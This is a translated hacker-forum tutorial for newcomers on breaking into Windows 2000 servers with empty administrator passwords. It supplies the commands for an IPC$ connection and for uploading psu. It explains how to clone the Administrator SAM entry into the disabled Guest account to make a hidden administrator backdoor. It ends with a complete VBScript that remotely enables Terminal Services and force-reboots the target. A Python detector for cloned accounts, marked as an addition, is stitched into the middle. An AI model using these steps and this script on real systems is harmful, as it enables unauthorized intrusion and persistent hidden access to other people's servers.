A simple 3389 intrusion walkthrough
Original author: caozhe (草哲)
Source: 中国欲网技术论坛 -- 草哲

I have seen a great many articles online about how to break into this or that, and I think a newbie simply cannot follow them!

So I had an idea: write something simpler, suitable for newbies, and pass on what I have learned!
To do this, I suggest you work from a Windows 2000 machine.
First of all, you need tools. Here are a few programs I recommend; they are the ones I use all the time:
for scanning, X-Scan V2.3, WINNTAutoAttack and 流光 (Fluxay)!
I rarely use X-Scan these days; mostly I use WINNTAutoAttack, and of course I use 小榕's 流光 a lot too.
Opening Terminal Services remotely only takes a script; the code is in the second post below. Save it as *.vbe (I saved mine as rots.vbe).
Cloning an account only takes psu.

OK. Say the scan turns up a server with a weak NT password: IP address 120.0.0.1, administrator account administrator, empty password.
Run CMD (the DOS prompt under 2000); we are going to open a terminal on it.
The command is:
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
This should be easy to follow: cscript rots.vbe is the command; after it come the IP, then the administrator account, then the password (the administrator password on 120.0.0.1 is empty, so a pair of double quotes stands for the empty string), then the port, which you can set to any port you like for the terminal, and finally /fr, the reboot switch (a forced reboot; I normally use this, but /r, a normal reboot, also works).

Terminal Services only exists on Win2000 Server and above (Server included); Professional will not do. This version of the script checks the target's OS version and, if it is Professional, prompts you to abort the install.
If everything goes well, you will be able to connect to the terminal after a short wait. Ping the target to see whether it has rebooted: ping 120.0.0.1 -t
Once the install is done, connect with a terminal client. Now let's clone an account, to make life easier later on.

Back at the DOS prompt, set up an IPC$ connection:
net use \\120.0.0.1\ipc$ "" /user:"administrator"
This command should be self-explanatory. Once it completes, upload psu to the target's winnt\system32 directory:
copy psu.exe \\120.0.0.1\admin$\system32
Upload finished; now build the backdoor account on the zombie. Over to the zombie!

Suppose the guest user is disabled; guest is the account we will turn into the backdoor.
Run CMD on that server and type at the command line:
psu -p regedit -i PID

A word of explanation: the PID at the end is the PID of the system process winlogon. Right-click the taskbar and open Task Manager,
go to the Processes tab and find the winlogon process; the number next to it is winlogon's PID. Say it is 5458.
Then the command is:
psu -p regedit -i 5458
This opens the Registry Editor directly, running with winlogon's SYSTEM token. The SAM hive is only readable by SYSTEM, so this is what lets you read the local SAM.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information. What we want is to clone the disabled guest into an account with administrator privileges.
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Look at the type shown for the administrator entry: 0x1f4. Then look at guest: 0x1f5. (The type field of each Names entry is the account's RID: 0x1f4 = 500, 0x1f5 = 501, which is why the per-account keys below are named 000001F4 and 000001F5.)
Knowing the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Double-click the F value on the right, copy the jumble of bytes inside, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
Double-click the F value on the right and paste in what you just copied.

Once that is done, export these two keys: HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
After exporting, delete both keys, then import the exported file again. Close the Registry Editor.

Open CMD and type at the command line
net user guest password
This sets guest's password; the trailing password is the password itself.
Then type
net user guest /active:y
This activates the guest account. Then we disable it again:
net user guest /active:n
All three commands must be run from the DOS prompt!

Done! Open Computer Management and look at Users: guest still shows as disabled, haha, but it now has administrator privileges!
It does not appear in the Administrators group either, yet it can log on to the terminal just like the administrator account.
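A detection for the cloning step above, as an added example that is not part of the original post or of psu. The post has you export the 000001F5 and Names\Guest keys with regedit; the same export format, taken over the whole Users key from a SYSTEM shell, is enough to spot a cloned account afterwards: each per-account F value carries the account's own RID inside the blob, so a Guest key (0x1F5) whose F still says 0x1F4 has had Administrator's F pasted into it, whether or not the account shows as disabled. The F-value offsets used here (RID at 0x30, account-control flags at 0x38) are the layout used by public SAM hive parsers, not something this post documents, and the .reg text is constructed for the example.

```python
import re
import struct
from typing import Dict, List

# Layout of the per-user "F" value as used by public SAM hive parsers (an assumption for this
# example; the post above never documents the blob). Only these two fields are read.
F_SIZE = 0x50
F_RID_OFFSET = 0x30      # DWORD, little-endian: the RID stored inside the blob
F_ACB_OFFSET = 0x38      # WORD: account-control bits
ACB_DISABLED = 0x0001    # USER_ACCOUNT_DISABLED

USERS_KEY = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
HEX_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=hex:(?P<data>.*)$')


def hex_chunk(s: str) -> str:
    """'02,00,01,' -> '020001' (the comma regedit leaves before a line break is dropped)."""
    return "".join(p.strip() for p in s.split(",") if p.strip())


def parse_reg_export(text: str) -> Dict[str, Dict[str, bytes]]:
    """Parse the REG_BINARY ("hex:") values of a regedit export into {key path: {name: bytes}}.
    regedit wraps long values: a trailing backslash, then the rest on indented lines."""
    keys: Dict[str, Dict[str, bytes]] = {}
    current, name, chunks = None, None, []     # key being read, value being assembled
    for raw in text.splitlines():
        line = raw.strip()
        if name is None:
            m = KEY_RE.match(line)
            if m:
                current = m.group("path")
                keys.setdefault(current, {})
                continue
            m = HEX_VALUE_RE.match(line)
            if not m or current is None:
                continue
            name, line = m.group("name"), m.group("data")
        cont = line.endswith("\\")                 # more bytes on the next line?
        chunks.append(hex_chunk(line[:-1] if cont else line))
        if not cont:
            keys[current][name] = bytes.fromhex("".join(chunks))
            name, chunks = None, []
    return keys


def parse_f_value(f: bytes) -> Dict[str, int]:
    """Pull the embedded RID and the account-control flags out of an F blob."""
    return {"rid": struct.unpack_from("<I", f, F_RID_OFFSET)[0],
            "acb": struct.unpack_from("<H", f, F_ACB_OFFSET)[0]}


def find_cloned_accounts(keys: Dict[str, Dict[str, bytes]]) -> List[Dict[str, object]]:
    """Flag every Users\\<RID> key whose F blob carries a different RID: that is what pasting
    Administrator's F (RID 0x1F4) into Guest's key (0x1F5) leaves behind."""
    findings = []
    for path, values in keys.items():
        tail = path.rsplit("\\", 1)[-1]
        f = values.get("F", b"")
        if not re.fullmatch(r"[0-9A-Fa-f]{8}", tail) or len(f) < F_ACB_OFFSET + 2:
            continue                                # Names\..., or no usable F value
        key_rid, info = int(tail, 16), parse_f_value(f)
        if info["rid"] != key_rid:
            findings.append({"key_rid": key_rid, "embedded_rid": info["rid"],
                             "disabled": bool(info["acb"] & ACB_DISABLED)})
    return findings


# ---- constructed sample: a regedit export of three accounts, one of them cloned ----
def make_f(rid: int, acb: int, stamp: int) -> bytes:
    """Synthetic F blob: only the fields read above plus one timestamp field are filled."""
    buf = bytearray(F_SIZE)
    struct.pack_into("<Q", buf, 0x18, stamp)
    struct.pack_into("<I", buf, F_RID_OFFSET, rid)
    struct.pack_into("<H", buf, F_ACB_OFFSET, acb)
    return bytes(buf)


def to_reg_hex(data: bytes) -> str:
    """Render bytes the way regedit does: 'hex:aa,bb,...,\\' plus indented continuation lines."""
    parts = [f"{b:02x}" for b in data]
    return "hex:" + ",\\\n  ".join(",".join(parts[i:i + 16]) for i in range(0, len(parts), 16))


SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00", "",
    f"[{USERS_KEY}\\000001F4]", '"F"=' + to_reg_hex(make_f(0x1F4, 0x0010, 0x01C1)),
    '"V"=hex:00,00,00,00', "",
    f"[{USERS_KEY}\\000001F5]",      # Guest: Administrator's F pasted in, then disabled again
    '"F"=' + to_reg_hex(make_f(0x1F4, 0x0011, 0x01C2)), "",
    f"[{USERS_KEY}\\000003E8]", '"F"=' + to_reg_hex(make_f(0x3E8, 0x0010, 0x01C3)), "",
])

if __name__ == "__main__":
    for hit in find_cloned_accounts(parse_reg_export(SAMPLE_REG)):
        print(f"RID {hit['key_rid']:#x}: F says RID {hit['embedded_rid']:#x}, "
              f"disabled={hit['disabled']} -> cloned account")
```

On a real box, export the whole Users key from a SYSTEM shell (the psu trick above, or any other way of getting a SYSTEM token) and feed the file to parse_reg_export; regedit writes "Version 5.00" exports as UTF-16, so open the file with encoding="utf-16". The check keys off the RID alone on purpose: the net user commands in the post change the flags and timestamps in Guest's F after the paste, so comparing whole blobs between accounts would miss the clone.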

Log off and log on as guest!
Typing all this has worn me out; it was not easy! I hope everyone can follow the above.
If anything is still unclear, ask me and I will tell you whatever I know.
I am a newbie myself and get a bit carried away once I learn a few things; if anything is wrong, I would appreciate the experts' corrections.

----------------------------------------------------------------------
Below is the script that opens the terminal; save it as *.vbe
on error resume next
' ROTS (Remote Open Terminal services Script): connects to the target over WMI with the
' given credentials, writes the registry values that enable Terminal Services, sets the
' RDP listening port and optionally reboots the target so the service comes up.
set outstreem=wscript.stdout
set instreem=wscript.stdin
' If launched with wscript.exe (e.g. double-clicked), relaunch under cscript in a console window.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if
if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
' Arguments arrive as strings; convert before the range check, because a string compared
' against a number does not compare numerically in VBScript.
if not isnumeric(port) then
    wscript.echo "The number of port is error."
    wscript.quit
end if
port=clng(port)
if port<1 or port>65535 then
    wscript.echo "The number of port is error."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
outstreem.write "Connecting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
' Privileges Win32Shutdown needs: 23 = wbemPrivilegeRemoteShutdown, 18 = wbemPrivilegeShutdown.
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
' Terminal Services only ships with the Server editions, so offer to abort on anything else.
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    ' Turn Terminal Services on; RDP driver and service set to auto-start (2 = SERVICE_AUTO_START).
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    ' Listening port of the RDP-Tcp listener (3389 unless overridden on the command line).
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = reboot + force (4).
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

' Print "OK!" when the last WMI call succeeded; otherwise print the error and exit.
function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visit www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function

Reposted from 安全焦点